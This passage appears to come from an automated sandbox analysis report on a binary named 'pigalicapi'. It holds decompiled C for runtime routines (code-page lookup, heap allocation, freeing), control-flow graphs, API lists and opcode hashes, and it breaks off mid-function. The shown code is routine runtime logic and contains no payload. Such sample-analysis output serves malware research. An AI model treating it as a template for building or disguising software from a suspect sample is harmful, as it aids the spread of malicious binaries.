                                                                                                                                                                                                                                                                      0x00fbb60f
                                                                                                                                                                                                                                                                      0x00fbb619
                                                                                                                                                                                                                                                                      0x00fbb61e
                                                                                                                                                                                                                                                                      0x00fbb626
                                                                                                                                                                                                                                                                      0x00fbb62c
                                                                                                                                                                                                                                                                      0x00fbb62d
                                                                                                                                                                                                                                                                      0x00fbb630
                                                                                                                                                                                                                                                                      0x00fbb683
                                                                                                                                                                                                                                                                      0x00fbb632
                                                                                                                                                                                                                                                                      0x00fbb632
                                                                                                                                                                                                                                                                      0x00fbb636
                                                                                                                                                                                                                                                                      0x00fbb639
                                                                                                                                                                                                                                                                      0x00fbb63b
                                                                                                                                                                                                                                                                      0x00fbb63b
                                                                                                                                                                                                                                                                      0x00fbb63e
                                                                                                                                                                                                                                                                      0x00fbb640
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00fbb642
                                                                                                                                                                                                                                                                      0x00fbb645
                                                                                                                                                                                                                                                                      0x00fbb650
                                                                                                                                                                                                                                                                      0x00fbb650
                                                                                                                                                                                                                                                                      0x00fbb652
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00fbb64a
                                                                                                                                                                                                                                                                      0x00fbb64f
                                                                                                                                                                                                                                                                      0x00fbb64f
                                                                                                                                                                                                                                                                      0x00fbb64f
                                                                                                                                                                                                                                                                      0x00fbb654
                                                                                                                                                                                                                                                                      0x00fbb657
                                                                                                                                                                                                                                                                      0x00fbb65a
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00fbb65a
                                                                                                                                                                                                                                                                      0x00fbb63b
                                                                                                                                                                                                                                                                      0x00fbb65c
                                                                                                                                                                                                                                                                      0x00fbb65c
                                                                                                                                                                                                                                                                      0x00fbb65f
                                                                                                                                                                                                                                                                      0x00fbb664
                                                                                                                                                                                                                                                                      0x00fbb664
                                                                                                                                                                                                                                                                      0x00fbb667
                                                                                                                                                                                                                                                                      0x00fbb668
                                                                                                                                                                                                                                                                      0x00fbb668
                                                                                                                                                                                                                                                                      0x00fbb668
                                                                                                                                                                                                                                                                      0x00fbb678
                                                                                                                                                                                                                                                                      0x00fbb67e
                                                                                                                                                                                                                                                                      0x00fbb67e
                                                                                                                                                                                                                                                                      0x00fbb688
                                                                                                                                                                                                                                                                      0x00fbb68b
                                                                                                                                                                                                                                                                      0x00fbb68c
                                                                                                                                                                                                                                                                      0x00fbb68d
                                                                                                                                                                                                                                                                      0x00fbb751
                                                                                                                                                                                                                                                                      0x00fbb752
                                                                                                                                                                                                                                                                      0x00fbb757
                                                                                                                                                                                                                                                                      0x00fbb758
                                                                                                                                                                                                                                                                      0x00fbb758
                                                                                                                                                                                                                                                                      0x00fbb609
                                                                                                                                                                                                                                                                      0x00fbb5f6
                                                                                                                                                                                                                                                                      0x00fbb5e4
                                                                                                                                                                                                                                                                      0x00fbb5d8
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00fbb75a
                                                                                                                                                                                                                                                                      0x00fbb6b8
                                                                                                                                                                                                                                                                      0x00fbb6c0
                                                                                                                                                                                                                                                                      0x00fbb6c0
                                                                                                                                                                                                                                                                      0x00fbb6c4
                                                                                                                                                                                                                                                                      0x00fbb6c7
                                                                                                                                                                                                                                                                      0x00fbb6cd
                                                                                                                                                                                                                                                                      0x00fbb6d0
                                                                                                                                                                                                                                                                      0x00fbb6d0
                                                                                                                                                                                                                                                                      0x00fbb6d3
                                                                                                                                                                                                                                                                      0x00fbb6d5
                                                                                                                                                                                                                                                                      0x00fbb6d7
                                                                                                                                                                                                                                                                      0x00fbb6d7
                                                                                                                                                                                                                                                                      0x00fbb6da
                                                                                                                                                                                                                                                                      0x00fbb6dc
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00fbb6de
                                                                                                                                                                                                                                                                      0x00fbb6e1
                                                                                                                                                                                                                                                                      0x00fbb6fd
                                                                                                                                                                                                                                                                      0x00fbb6fd
                                                                                                                                                                                                                                                                      0x00fbb6ff
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00fbb6e6
                                                                                                                                                                                                                                                                      0x00fbb6ec
                                                                                                                                                                                                                                                                      0x00fbb6ee
                                                                                                                                                                                                                                                                      0x00fbb6f4
                                                                                                                                                                                                                                                                      0x00fbb6f8
                                                                                                                                                                                                                                                                      0x00fbb6f8
                                                                                                                                                                                                                                                                      0x00fbb6f9
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00fbb6f9
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00fbb6ec
                                                                                                                                                                                                                                                                      0x00fbb701
                                                                                                                                                                                                                                                                      0x00fbb704
                                                                                                                                                                                                                                                                      0x00fbb707
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00fbb707
                                                                                                                                                                                                                                                                      0x00fbb709
                                                                                                                                                                                                                                                                      0x00fbb709
                                                                                                                                                                                                                                                                      0x00fbb70c
                                                                                                                                                                                                                                                                      0x00fbb70d
                                                                                                                                                                                                                                                                      0x00fbb710
                                                                                                                                                                                                                                                                      0x00fbb713
                                                                                                                                                                                                                                                                      0x00fbb713
                                                                                                                                                                                                                                                                      0x00fbb719
                                                                                                                                                                                                                                                                      0x00fbb71c
                                                                                                                                                                                                                                                                      0x00fbb72b
                                                                                                                                                                                                                                                                      0x00fbb734
                                                                                                                                                                                                                                                                      0x00fbb739
                                                                                                                                                                                                                                                                      0x00fbb73f
                                                                                                                                                                                                                                                                      0x00fbb740
                                                                                                                                                                                                                                                                      0x00fbb740
                                                                                                                                                                                                                                                                      0x00fbb743
                                                                                                                                                                                                                                                                      0x00fbb746
                                                                                                                                                                                                                                                                      0x00fbb749
                                                                                                                                                                                                                                                                      0x00fbb74c
                                                                                                                                                                                                                                                                      0x00fbb74c
                                                                                                                                                                                                                                                                      0x00fbb74c
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00fbb5a0
                                                                                                                                                                                                                                                                      0x00fbb5a1
                                                                                                                                                                                                                                                                      0x00fbb5a7
                                                                                                                                                                                                                                                                      0x00fbb75b
                                                                                                                                                                                                                                                                      0x00fbb76a

                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                        • Part of subcall function 00FBB14D: GetOEMCP.KERNEL32(00000000), ref: 00FBB178
                                                                                                                                                                                                                                                                      • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00FBB41B,?,00000000), ref: 00FBB5EE
                                                                                                                                                                                                                                                                      • GetCPInfo.KERNEL32(00000000,00FBB41B,?,?,?,00FBB41B,?,00000000), ref: 00FBB601
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.816390745.0000000000FB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.816295604.0000000000FB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.816834724.0000000000FC9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.817552219.000000000100C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.818143401.000000000104D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.818176629.000000000104F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_fb0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: CodeInfoPageValid
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 546120528-0
                                                                                                                                                                                                                                                                      • Opcode ID: f513fae05459016dc4d583436f44a1c62db9944cf7346778f2391a8a3bb48d87
                                                                                                                                                                                                                                                                      • Instruction ID: d5fd9df55d4b1cef8a740cec22155242c843ca7e18592c54f97685d3d3dc2d7d
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f513fae05459016dc4d583436f44a1c62db9944cf7346778f2391a8a3bb48d87
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C7515470D042099FDB208F77C885AFABBE6EF51310F2440AED0968B151E7B89941EF90
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                      control_flow_graph 212 fbb3b9-fbb3e3 call fb9c30 call fbb4d8 call fbb14d 219 fbb3e9-fbb3fe call fbbd19 212->219 220 fbb3e5-fbb3e7 212->220 224 fbb42e 219->224 225 fbb400-fbb416 call fbb57a 219->225 221 fbb43c-fbb43f 220->221 227 fbb430-fbb43b call fba6da 224->227 228 fbb41b-fbb421 225->228 227->221 230 fbb423-fbb428 call fb9826 228->230 231 fbb440-fbb444 228->231 230->224 233 fbb44b-fbb456 231->233 234 fbb446 call fb9de4 231->234 237 fbb458-fbb462 233->237 238 fbb46d-fbb487 233->238 234->233 237->238 240 fbb464-fbb46c call fba6da 237->240 238->227 241 fbb489-fbb490 238->241 240->238 241->227 243 fbb492-fbb4a9 call fbb023 241->243 243->227 247 fbb4ab-fbb4b5 243->247 247->227
                                                                                                                                                                                                                                                                      C-Code - Quality: 95%
                                                                                                                                                                                                                                                                      			E00FBB3B9(signed int __ebx, void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, char _a8) {
                                                                                                                                                                                                                                                                      				char _v8;
                                                                                                                                                                                                                                                                      				char _v16;
                                                                                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                                                                                      				void* __ebp;
                                                                                                                                                                                                                                                                      				char _t31;
                                                                                                                                                                                                                                                                      				signed int _t36;
                                                                                                                                                                                                                                                                      				char _t40;
                                                                                                                                                                                                                                                                      				intOrPtr _t44;
                                                                                                                                                                                                                                                                      				char _t45;
                                                                                                                                                                                                                                                                      				signed int _t51;
                                                                                                                                                                                                                                                                      				void* _t64;
                                                                                                                                                                                                                                                                      				void* _t70;
                                                                                                                                                                                                                                                                      				signed int _t75;
                                                                                                                                                                                                                                                                      				void* _t81;
                                                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                                                      				_t81 = __eflags;
                                                                                                                                                                                                                                                                      				_v8 = E00FB9C30(__ebx, __ecx, __edx);
                                                                                                                                                                                                                                                                      				E00FBB4D8(__ebx, __ecx, __edx);
                                                                                                                                                                                                                                                                      				_t31 = E00FBB14D(_t81, _a4);
                                                                                                                                                                                                                                                                      				_v16 = _t31;
                                                                                                                                                                                                                                                                      				_t57 =  *(_v8 + 0x48);
                                                                                                                                                                                                                                                                      				if(_t31 ==  *((intOrPtr*)( *(_v8 + 0x48) + 4))) {
                                                                                                                                                                                                                                                                      					return 0;
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				_push(__ebx);
                                                                                                                                                                                                                                                                      				_t70 = E00FBBD19(_t57, 0x220);
                                                                                                                                                                                                                                                                      				_t51 = __ebx | 0xffffffff;
                                                                                                                                                                                                                                                                      				__eflags = _t70;
                                                                                                                                                                                                                                                                      				if(__eflags == 0) {
                                                                                                                                                                                                                                                                      					L5:
                                                                                                                                                                                                                                                                      					_t75 = _t51;
                                                                                                                                                                                                                                                                      					goto L6;
                                                                                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                                                                                      					_t70 = memcpy(_t70,  *(_v8 + 0x48), 0x88 << 2);
                                                                                                                                                                                                                                                                      					 *_t70 =  *_t70 & 0x00000000; // executed
                                                                                                                                                                                                                                                                      					_t36 = E00FBB57A(_t51, _t70,  *(_v8 + 0x48), __eflags, _v16, _t70); // executed
                                                                                                                                                                                                                                                                      					_t75 = _t36;
                                                                                                                                                                                                                                                                      					__eflags = _t75 - _t51;
                                                                                                                                                                                                                                                                      					if(_t75 != _t51) {
                                                                                                                                                                                                                                                                      						__eflags = _a8;
                                                                                                                                                                                                                                                                      						if(_a8 == 0) {
                                                                                                                                                                                                                                                                      							E00FB9DE4();
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      						asm("lock xadd [eax], ebx");
                                                                                                                                                                                                                                                                      						__eflags = _t51 == 1;
                                                                                                                                                                                                                                                                      						if(_t51 == 1) {
                                                                                                                                                                                                                                                                      							_t45 = _v8;
                                                                                                                                                                                                                                                                      							__eflags =  *((intOrPtr*)(_t45 + 0x48)) - 0x104dae0;
                                                                                                                                                                                                                                                                      							if( *((intOrPtr*)(_t45 + 0x48)) != 0x104dae0) {
                                                                                                                                                                                                                                                                      								E00FBA6DA( *((intOrPtr*)(_t45 + 0x48)));
                                                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      						 *_t70 = 1;
                                                                                                                                                                                                                                                                      						_t64 = _t70;
                                                                                                                                                                                                                                                                      						_t70 = 0;
                                                                                                                                                                                                                                                                      						 *(_v8 + 0x48) = _t64;
                                                                                                                                                                                                                                                                      						_t40 = _v8;
                                                                                                                                                                                                                                                                      						__eflags =  *(_t40 + 0x350) & 0x00000002;
                                                                                                                                                                                                                                                                      						if(( *(_t40 + 0x350) & 0x00000002) == 0) {
                                                                                                                                                                                                                                                                      							__eflags =  *0x104dd04 & 0x00000001;
                                                                                                                                                                                                                                                                      							if(( *0x104dd04 & 0x00000001) == 0) {
                                                                                                                                                                                                                                                                      								_v16 =  &_v8;
                                                                                                                                                                                                                                                                      								E00FBB023(5,  &_v16);
                                                                                                                                                                                                                                                                      								__eflags = _a8;
                                                                                                                                                                                                                                                                      								if(_a8 != 0) {
                                                                                                                                                                                                                                                                      									_t44 =  *0x104dd00; // 0x10e2758
                                                                                                                                                                                                                                                                      									 *0x104d7cc = _t44;
                                                                                                                                                                                                                                                                      								}
                                                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      						L6:
                                                                                                                                                                                                                                                                      						E00FBA6DA(_t70);
                                                                                                                                                                                                                                                                      						return _t75;
                                                                                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                                                                                      						 *((intOrPtr*)(E00FB9826())) = 0x16;
                                                                                                                                                                                                                                                                      						goto L5;
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      			}


















                                                                                                                                                                                                                                                                      0x00fbb3b9
                                                                                                                                                                                                                                                                      0x00fbb3c6
                                                                                                                                                                                                                                                                      0x00fbb3c9
                                                                                                                                                                                                                                                                      0x00fbb3d1
                                                                                                                                                                                                                                                                      0x00fbb3da
                                                                                                                                                                                                                                                                      0x00fbb3dd
                                                                                                                                                                                                                                                                      0x00fbb3e3
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00fbb3e5
                                                                                                                                                                                                                                                                      0x00fbb3e9
                                                                                                                                                                                                                                                                      0x00fbb3f6
                                                                                                                                                                                                                                                                      0x00fbb3f8
                                                                                                                                                                                                                                                                      0x00fbb3fc
                                                                                                                                                                                                                                                                      0x00fbb3fe
                                                                                                                                                                                                                                                                      0x00fbb42e
                                                                                                                                                                                                                                                                      0x00fbb42e
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00fbb400
                                                                                                                                                                                                                                                                      0x00fbb40d
                                                                                                                                                                                                                                                                      0x00fbb413
                                                                                                                                                                                                                                                                      0x00fbb416
                                                                                                                                                                                                                                                                      0x00fbb41b
                                                                                                                                                                                                                                                                      0x00fbb41f
                                                                                                                                                                                                                                                                      0x00fbb421
                                                                                                                                                                                                                                                                      0x00fbb440
                                                                                                                                                                                                                                                                      0x00fbb444
                                                                                                                                                                                                                                                                      0x00fbb446
                                                                                                                                                                                                                                                                      0x00fbb446
                                                                                                                                                                                                                                                                      0x00fbb451
                                                                                                                                                                                                                                                                      0x00fbb455
                                                                                                                                                                                                                                                                      0x00fbb456
                                                                                                                                                                                                                                                                      0x00fbb458
                                                                                                                                                                                                                                                                      0x00fbb45b
                                                                                                                                                                                                                                                                      0x00fbb462
                                                                                                                                                                                                                                                                      0x00fbb467
                                                                                                                                                                                                                                                                      0x00fbb46c
                                                                                                                                                                                                                                                                      0x00fbb462
                                                                                                                                                                                                                                                                      0x00fbb46d
                                                                                                                                                                                                                                                                      0x00fbb473
                                                                                                                                                                                                                                                                      0x00fbb478
                                                                                                                                                                                                                                                                      0x00fbb47a
                                                                                                                                                                                                                                                                      0x00fbb47d
                                                                                                                                                                                                                                                                      0x00fbb480
                                                                                                                                                                                                                                                                      0x00fbb487
                                                                                                                                                                                                                                                                      0x00fbb489
                                                                                                                                                                                                                                                                      0x00fbb490
                                                                                                                                                                                                                                                                      0x00fbb495
                                                                                                                                                                                                                                                                      0x00fbb49e
                                                                                                                                                                                                                                                                      0x00fbb4a3
                                                                                                                                                                                                                                                                      0x00fbb4a9
                                                                                                                                                                                                                                                                      0x00fbb4ab
                                                                                                                                                                                                                                                                      0x00fbb4b0
                                                                                                                                                                                                                                                                      0x00fbb4b0
                                                                                                                                                                                                                                                                      0x00fbb4a9
                                                                                                                                                                                                                                                                      0x00fbb490
                                                                                                                                                                                                                                                                      0x00fbb430
                                                                                                                                                                                                                                                                      0x00fbb431
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00fbb423
                                                                                                                                                                                                                                                                      0x00fbb428
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00fbb428
                                                                                                                                                                                                                                                                      0x00fbb421

                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB9C30: GetLastError.KERNEL32(?,?,00FB5EB1,?,?,?,00FB4B88,?), ref: 00FB9C34
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB9C30: _free.LIBCMT ref: 00FB9C67
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB9C30: SetLastError.KERNEL32(00000000,?), ref: 00FB9CA8
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB9C30: _abort.LIBCMT ref: 00FB9CAE
                                                                                                                                                                                                                                                                        • Part of subcall function 00FBB4D8: _abort.LIBCMT ref: 00FBB50A
                                                                                                                                                                                                                                                                        • Part of subcall function 00FBB4D8: _free.LIBCMT ref: 00FBB53E
                                                                                                                                                                                                                                                                        • Part of subcall function 00FBB14D: GetOEMCP.KERNEL32(00000000), ref: 00FBB178
                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00FBB431
                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00FBB467
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.816390745.0000000000FB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.816295604.0000000000FB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.816834724.0000000000FC9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.817552219.000000000100C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.818143401.000000000104D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.818176629.000000000104F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_fb0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: _free$ErrorLast_abort
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 2991157371-0
                                                                                                                                                                                                                                                                      • Opcode ID: 6d07e34bb834f8e43106e100d3541b85419be7911da41c02e394afef340442e6
                                                                                                                                                                                                                                                                      • Instruction ID: 1db0e814167be5b77406e2b51076efd926c33a436ee2adf4b1b6285c7f42d167
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6d07e34bb834f8e43106e100d3541b85419be7911da41c02e394afef340442e6
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3C31C731D04208EFDB10EFAAD941BE97BE4FF50324F2541A9E5049B292DBB65D41EF50
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                      control_flow_graph 271 fc1d69-fc1d76 call fba67d 273 fc1d7b-fc1d86 271->273 274 fc1d8c-fc1d94 273->274 275 fc1d88-fc1d8a 273->275 276 fc1dd4-fc1de2 call fba6da 274->276 277 fc1d96-fc1d9a 274->277 275->276 279 fc1d9c-fc1dce call fba986 277->279 283 fc1dd0-fc1dd3 279->283 283->276
                                                                                                                                                                                                                                                                      C-Code - Quality: 91%
                                                                                                                                                                                                                                                                      			E00FC1D69(void* __esi, void* __eflags) {
                                                                                                                                                                                                                                                                      				intOrPtr _v12;
                                                                                                                                                                                                                                                                      				void* __ecx;
                                                                                                                                                                                                                                                                      				char _t16;
                                                                                                                                                                                                                                                                      				void* _t17;
                                                                                                                                                                                                                                                                      				void* _t26;
                                                                                                                                                                                                                                                                      				void* _t28;
                                                                                                                                                                                                                                                                      				void* _t30;
                                                                                                                                                                                                                                                                      				char _t31;
                                                                                                                                                                                                                                                                      				void* _t33;
                                                                                                                                                                                                                                                                      				intOrPtr* _t35;
                                                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                                                      				_push(_t26);
                                                                                                                                                                                                                                                                      				_push(_t26);
                                                                                                                                                                                                                                                                      				_t16 = E00FBA67D(_t26, 0x40, 0x30); // executed
                                                                                                                                                                                                                                                                      				_t31 = _t16;
                                                                                                                                                                                                                                                                      				_v12 = _t31;
                                                                                                                                                                                                                                                                      				_t28 = _t30;
                                                                                                                                                                                                                                                                      				if(_t31 != 0) {
                                                                                                                                                                                                                                                                      					_t2 = _t31 + 0xc00; // 0xc00
                                                                                                                                                                                                                                                                      					_t17 = _t2;
                                                                                                                                                                                                                                                                      					__eflags = _t31 - _t17;
                                                                                                                                                                                                                                                                      					if(__eflags != 0) {
                                                                                                                                                                                                                                                                      						_t3 = _t31 + 0x20; // 0x20
                                                                                                                                                                                                                                                                      						_t35 = _t3;
                                                                                                                                                                                                                                                                      						_t33 = _t17;
                                                                                                                                                                                                                                                                      						do {
                                                                                                                                                                                                                                                                      							_t4 = _t35 - 0x20; // 0x0
                                                                                                                                                                                                                                                                      							E00FBA986(_t28, _t35, __eflags, _t4, 0xfa0, 0);
                                                                                                                                                                                                                                                                      							 *(_t35 - 8) =  *(_t35 - 8) | 0xffffffff;
                                                                                                                                                                                                                                                                      							 *_t35 = 0;
                                                                                                                                                                                                                                                                      							_t35 = _t35 + 0x30;
                                                                                                                                                                                                                                                                      							 *((intOrPtr*)(_t35 - 0x2c)) = 0;
                                                                                                                                                                                                                                                                      							 *((intOrPtr*)(_t35 - 0x28)) = 0xa0a0000;
                                                                                                                                                                                                                                                                      							 *((char*)(_t35 - 0x24)) = 0xa;
                                                                                                                                                                                                                                                                      							 *(_t35 - 0x23) =  *(_t35 - 0x23) & 0x000000f8;
                                                                                                                                                                                                                                                                      							 *((char*)(_t35 - 0x22)) = 0;
                                                                                                                                                                                                                                                                      							__eflags = _t35 - 0x20 - _t33;
                                                                                                                                                                                                                                                                      						} while (__eflags != 0);
                                                                                                                                                                                                                                                                      						_t31 = _v12;
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                                                                                      					_t31 = 0;
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				E00FBA6DA(0);
                                                                                                                                                                                                                                                                      				return _t31;
                                                                                                                                                                                                                                                                      			}













                                                                                                                                                                                                                                                                      0x00fc1d6e
                                                                                                                                                                                                                                                                      0x00fc1d6f
                                                                                                                                                                                                                                                                      0x00fc1d76
                                                                                                                                                                                                                                                                      0x00fc1d7b
                                                                                                                                                                                                                                                                      0x00fc1d7f
                                                                                                                                                                                                                                                                      0x00fc1d83
                                                                                                                                                                                                                                                                      0x00fc1d86
                                                                                                                                                                                                                                                                      0x00fc1d8c
                                                                                                                                                                                                                                                                      0x00fc1d8c
                                                                                                                                                                                                                                                                      0x00fc1d92
                                                                                                                                                                                                                                                                      0x00fc1d94
                                                                                                                                                                                                                                                                      0x00fc1d97
                                                                                                                                                                                                                                                                      0x00fc1d97
                                                                                                                                                                                                                                                                      0x00fc1d9a
                                                                                                                                                                                                                                                                      0x00fc1d9c
                                                                                                                                                                                                                                                                      0x00fc1da2
                                                                                                                                                                                                                                                                      0x00fc1da6
                                                                                                                                                                                                                                                                      0x00fc1dab
                                                                                                                                                                                                                                                                      0x00fc1daf
                                                                                                                                                                                                                                                                      0x00fc1db1
                                                                                                                                                                                                                                                                      0x00fc1db4
                                                                                                                                                                                                                                                                      0x00fc1dba
                                                                                                                                                                                                                                                                      0x00fc1dc1
                                                                                                                                                                                                                                                                      0x00fc1dc5
                                                                                                                                                                                                                                                                      0x00fc1dc9
                                                                                                                                                                                                                                                                      0x00fc1dcc
                                                                                                                                                                                                                                                                      0x00fc1dcc
                                                                                                                                                                                                                                                                      0x00fc1dd0
                                                                                                                                                                                                                                                                      0x00fc1dd3
                                                                                                                                                                                                                                                                      0x00fc1d88
                                                                                                                                                                                                                                                                      0x00fc1d88
                                                                                                                                                                                                                                                                      0x00fc1d88
                                                                                                                                                                                                                                                                      0x00fc1dd5
                                                                                                                                                                                                                                                                      0x00fc1de2

                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                        • Part of subcall function 00FBA67D: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00FB9C5E,00000001,00000364,?,00FB4B88,?), ref: 00FBA6BE
                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00FC1DD5
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.816390745.0000000000FB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.816295604.0000000000FB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.816834724.0000000000FC9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.817552219.000000000100C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.818143401.000000000104D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.818176629.000000000104F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_fb0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: AllocateHeap_free
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 614378929-0
                                                                                                                                                                                                                                                                      • Opcode ID: 92a6ae2d68cf9dbe8d0c4afe4cf0655b852b6560beefab47e5d447839bfd82a0
                                                                                                                                                                                                                                                                      • Instruction ID: 279f834c53c2c90c106494a386eda77bc517a825ceced2271678ae047e44f586
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 92a6ae2d68cf9dbe8d0c4afe4cf0655b852b6560beefab47e5d447839bfd82a0
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3801FE76600305ABE3259F56DC42E99FBE9FB85370F25051DE59583281EB306805DB74
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                      control_flow_graph 284 fba67d-fba688 285 fba68a-fba694 284->285 286 fba696-fba69c 284->286 285->286 287 fba6ca-fba6d5 call fb9826 285->287 288 fba69e-fba69f 286->288 289 fba6b5-fba6c6 RtlAllocateHeap 286->289 293 fba6d7-fba6d9 287->293 288->289 290 fba6c8 289->290 291 fba6a1-fba6a8 call fbc742 289->291 290->293 291->287 297 fba6aa-fba6b3 call fbc6ac 291->297 297->287 297->289
                                                                                                                                                                                                                                                                      C-Code - Quality: 95%
                                                                                                                                                                                                                                                                      			E00FBA67D(void* __ecx, signed int _a4, signed int _a8) {
